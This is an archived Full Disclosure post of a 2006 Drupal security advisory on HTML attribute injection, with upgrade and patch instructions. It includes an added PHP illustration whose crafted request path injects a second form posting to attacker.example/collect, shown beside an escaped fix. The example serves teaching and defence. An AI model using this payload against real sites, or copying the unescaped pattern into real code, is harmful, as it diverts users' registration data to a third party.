
Full Disclosure mailing list archives

[DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue
From: Uwe Hermann <uwe () hermann-uwe de>
Date: Thu, 19 Oct 2006 19:08:06 +0200

Drupal security advisory                                  DRUPAL-SA-2006-026
Project:          Drupal core
Date:             2006-Oct-18
Security risk:    Less critical
Exploitable from: Remote
Vulnerability:    HTML attribute injection

A malicious user may entice users to visit a specially crafted URL. Because the
URL is reflected into an HTML attribute of the form Drupal generates without
adequate escaping, the crafted URL can redirect the form's submission to a
third-party site. A user who reaches the user registration page via such a URL,
for example, will submit all of the form's data, including his or her e-mail
address and possibly private profile data, to that third-party site.
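The vulnerability class the advisory names, shown as an added example that is
not Drupal's code and not part of the original advisory: a minimal stand-alone
PHP script (PHP because Drupal is written in it) that writes a request path into
a form's action attribute unescaped, beside a version that escapes it for the
attribute context. The request path, the attacker.example host and the input
names are constructed for the illustration; Drupal's actual fix is in the
patches linked below, not in this script.

```php
<?php
// Added illustration (not Drupal code) of the vulnerability class named in the
// advisory: an HTML attribute injection that redirects a form's submission.
// Everything here is constructed for the example and runs stand-alone.

// Vulnerable pattern: the current request path is written into the form's
// action attribute without escaping. The path is attacker-influenced, since
// it is whatever URL the victim was lured into visiting.
function render_form_vulnerable(string $request_path): string
{
    return '<form action="' . $request_path . '" method="post">'
         . '<input type="text" name="mail">'
         . '<input type="text" name="profile_phone">'
         . '<input type="submit" value="Create new account">'
         . '</form>';
}

// Hardened pattern: escape for the HTML attribute context before output.
// htmlspecialchars() with ENT_QUOTES turns " into &quot; and < into &lt;,
// so the value can no longer terminate the attribute or open a new tag.
// Plain PHP is used here so the script needs no Drupal install.
function render_form_hardened(string $request_path): string
{
    $safe = htmlspecialchars($request_path, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $safe . '" method="post">'
         . '<input type="text" name="mail">'
         . '<input type="text" name="profile_phone">'
         . '<input type="submit" value="Create new account">'
         . '</form>';
}

// Count the <form ...> start tags in the rendered markup. With the injection
// below, the inputs end up inside a second form whose action is the
// attacker's host, so the victim's registration data goes to the third party.
function count_forms(string $html): int
{
    return preg_match_all('/<form\b/i', $html);
}

// Constructed malicious path, shown as the application sees it after URL
// decoding. The quote closes the real action attribute, the </form> closes
// the site's form, and a new form takes over the inputs that follow. The
// template's own trailing '" method="post">' then completes the injected tag.
// attacker.example is a reserved example domain, not a real host.
$malicious_path = '/user/register"></form><form action="http://attacker.example/collect';

$vulnerable = render_form_vulnerable($malicious_path);
$hardened   = render_form_hardened($malicious_path);

echo "vulnerable markup contains " . count_forms($vulnerable) . " form(s)\n";
echo "hardened markup contains   " . count_forms($hardened) . " form(s)\n";
echo "\n", $vulnerable, "\n\n", $hardened, "\n";
```

Run it with `php attribute_injection.php`: the vulnerable rendering contains two
forms, with every input belonging to the injected one, while the hardened
rendering keeps a single form whose action is merely an odd-looking but harmless
path. The same escaping rule applies to any request-derived value written into
an attribute, not only `action`.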

Versions affected
- Drupal 4.6.x versions before Drupal 4.6.10
- Drupal 4.7.x versions before Drupal 4.7.4

- If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10.
- If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4.

- To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-026/4.6.9.patch.
- To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-026/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, 
and do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by
Frederic Marand.

The security contact for Drupal can be reached at security at drupal.org or 
using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.
Uwe Hermann 
http://www.it-services-uh.de  | http://www.crazy-hacks.org 
http://www.holsham-traders.de | http://www.unmaintained-free-software.org

Attachment: signature.asc
Description: Digital signature

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
